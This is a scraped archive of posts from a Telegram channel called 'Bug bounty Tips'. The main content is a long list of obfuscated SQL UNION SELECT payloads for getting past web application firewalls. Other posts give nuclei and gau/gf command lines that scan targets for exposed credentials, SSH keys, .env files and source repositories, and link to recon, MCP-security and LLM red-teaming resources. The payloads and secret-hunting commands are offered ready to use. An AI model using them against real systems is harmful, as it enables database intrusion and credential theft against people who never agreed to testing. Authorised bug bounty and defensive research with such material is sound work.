اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
Bug bounty Tips
رفتن به کانال در Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
نمایش بیشتر5 792
مشترکین
+424 ساعت
+767 روز
+40730 روز
آرشیو پست ها
5 798
5 798
⚡Sn1per - Automate your recon like never before!
✅ https://github.com/1N3/Sn1per
5 798
Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+5 798
Active Directory Pentesting
https://exploit-notes.hdks.org/exploit/windows/active-directory/
5 798
Hey Hunter's,
DarkShadow here back again, just dropping a list of queries.
30K+ Search Queries 🚀
(Google | Shodan | FOFA)
For hunters, red teamers & OSINT warriors:
⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision
GitHub →https://github.com/projectdiscovery/awesome-search-queries
Show your love Guy's ❤️
#bugbountytips #osint
5 798
🔥 Find Low Hanging Fruits Using Nuclei AI 🔥
nuclei -list targets.txt -ai "Find exposed AI/ML model files (.pkl, .h5, .pt) that may leak proprietary algorithms or sensitive training data"
nuclei -list targets.txt -ai "Find exposed automation scripts (.sh, .ps1, .bat) revealing internal tooling or credentials"
nuclei -list targets.txt -ai "Identify misconfigured CSP headers allowing 'unsafe-inline' or wildcard sources"
nuclei -list targets.txt -ai "Detect pages leaking JWT tokens in URLs or cookies"
nuclei -list targets.txt -ai "Identify overly verbose error messages revealing framework or library details"
nuclei -list targets.txt -ai "Find application endpoints with verbose stack traces or source code exposure"
nuclei -list targets.txt -ai "Find sensitive information in HTML comments (debug notes, API keys, credentials)"
nuclei -list targets.txt -ai "Find exposed .env files leaking credentials, API keys, and database passwords"
nuclei -list targets.txt -ai "Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."
nuclei -list targets.txt -ai "Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."
nuclei -list targets.txt -ai "Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."
nuclei -list targets.txt -ai "Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."
nuclei -list targets.txt -ai "Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."
nuclei -list targets.txt -ai "Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."
nuclei -list targets.txt -ai "Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"
nuclei -list targets.txt -ai "Identify open directory listings exposing sensitive files"
nuclei -list targets.txt -ai "Find exposed .git directories allowing full repo download"
nuclei -list targets.txt -ai "Find exposed .svn and .hg repositories leaking source code"
nuclei -list targets.txt -ai "Identify open FTP servers allowing anonymous access"
nuclei -list targets.txt -ai "Find GraphQL endpoints with introspection enabled"
nuclei -list targets.txt -ai "Identify exposed .well-known directories revealing sensitive data"
nuclei -list targets.txt -ai "Find publicly accessible phpinfo() pages leaking environment details"
nuclei -list targets.txt -ai "Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"
nuclei -list targets.txt -ai "Identify exposed .vscode and .idea directories leaking developer configs"
nuclei -list targets.txt -ai "Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"
nuclei -list targets.txt -ai "Find exposed WordPress debug.log files leaking credentials and error messages"
nuclei -list targets.txt -ai "Detect misconfigured CORS allowing wildcard origins ('*')"
nuclei -list targets.txt -ai "Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"
nuclei -list targets.txt -ai "Find exposed admin panels with default credentials"
nuclei -list targets.txt -ai "Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."
nuclei -list targets.txt -ai "Detect web applications running in debug mode, potentially exposing sensitive system information."5 798
Find sensitive information with gf
# Search for testing point with gau and fff
gau target -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/
# After we save responses from known URLs, it's time to dig for secrets
for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done5 798
⚡Automated red-team toolkit for stress-testing LLM defences - Vector Attacks on LLMs
✅https://github.com/MrMoshkovitz/gandalf-llm-pentester
5 798
𝗠𝗖𝗣 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀
🔗 Awesome MCP Security:
https://github.com/Puliczek/awesome-mcp-security
🔗 Defensive Guide :
https://www.infracloud.io/blogs/securing-mcp-servers/
🔗 MCP Tool :
https://github.com/eqtylab/mcp-guardian
🔗 MCP Threat Modeling :
https://www.csoonline.com/article/4023795/top-10-mcp-vulnerabilities.html
🔗 MCP Security Research :
https://arxiv.org/pdf/2507.06250
🔗 MCP Security Article :
https://www.darkreading.com/application-security/agentic-ai-risky-mcp-backbone-attack-vectors
🔗 MCP Security 101 Guide :
https://www.redhat.com/en/blog/model-context-protocol-mcp-understanding-security-risks-and-controls
🔗 MCP Top Vulnerability :
https://cymulate.com/blog/cve-2025-53109-53110-escaperoute-anthropic/
🔗 MCP Security Video :
https://m.youtube.com/watch?v=zj29lslZxFg
@acesclan #mcp #agentic #ai
5 798
Google 🔍 Engineer dropped a book. A comprehensive guide to building agentic AI systems.
Key points:
Concepts: Prompt chaining, routing, memory, planning, safety, and evaluation.
✅Patterns: Design methods for multi-agent setups, tool-using agents, and autonomous workflows.
✅Hands-on: Code samples for implementing these patterns in real-world apps.
✅Goal: Help developers build reliable, scalable, and safe intelligent agents.
Think of it as a playbook for advanced AI agent design.📱https://docs.google.com/document/d/1rsaK53T3Lg5KoGwvf8ukOUvbELRtH-V0LnOIFDxBryE/mobilebasic
5 798
#info #Events #Cyber_Education
Cybersecurity Events Sep. - Dec. 2025:
1. Cyber-AI 2025 (Sep. 1-4)
2. Nullcon Berlin (Sep. 3-5)
3. Blue Team Con (Sep. 4-7)
4. SECCON 2025 (Sep. 9)
5. 44CON (Sep. 18-19)
6. National Cyber Summit (Sep. 23-25)
7. HackAICon 2025 (Sep. 25)
8. ESORICS 2025 (Sep. 22-26)
9. BruCON 2025 (Sep. 25-26)
10. COSAC 2025 (Sep.28 - Oct.2)
11. Black Hat AI Summit at SecTor (Sep.30 - Oct.2)
12. Hexacon 2025 (Oct. 4-5)
13. Offensive AI Con 2025 (Oct. 5-8)
14. c0c0n 2025 (Oct. 7-11)
15. Black Hat Fall Online Trainings (Oct. 20-23)
16. OWASP LASCON 2025 (Oct. 21-22)
17. IEEE ISSRE 2025 (Oct. 21-24)
18. DevSecCon 2025 (Oct. 22)
19. SAINTCON 2025 (Oct. 21-24)
20. IAPP Privacy.Security.Risk (Oct. 28-31)
21. OSINTCon 2025 (Nov. 1-2)
22. SANS Fall Cyber Solutions Fest - AI Track (Nov. 6)
23. DEATHCon (Nov. 8-9)
24. POC2025 Hacking Conference (Nov. 13-14)
25. SURICON 2025 (Nov. 19-21)
26. Black Hat Middle East & Africa (Dec. 2-4)
27. Black Hat Europe 2025 (Dec. 8-11)
28. Annual Computer Security Applications Conference (ACSAC2025) (Dec. 8-12)
29. BSidesTLV 2025 (Dec. 11)
30. SANS Cyber Defense Initiative (Dec. 12-17)
5 798
#Tech_book
"Advanced Python for Cybersecurity:
Techniques in Malware Analysis, Exploit Development, and Custom Tool Creation", 2024.
// By integrating Python into your cybersecurity arsenal, you can automate repetitive tasks, enhance your analytical capabilities, forge custom tools tailored to specific threats, and ultimately fortify your defenses against an ever-evolving adversary
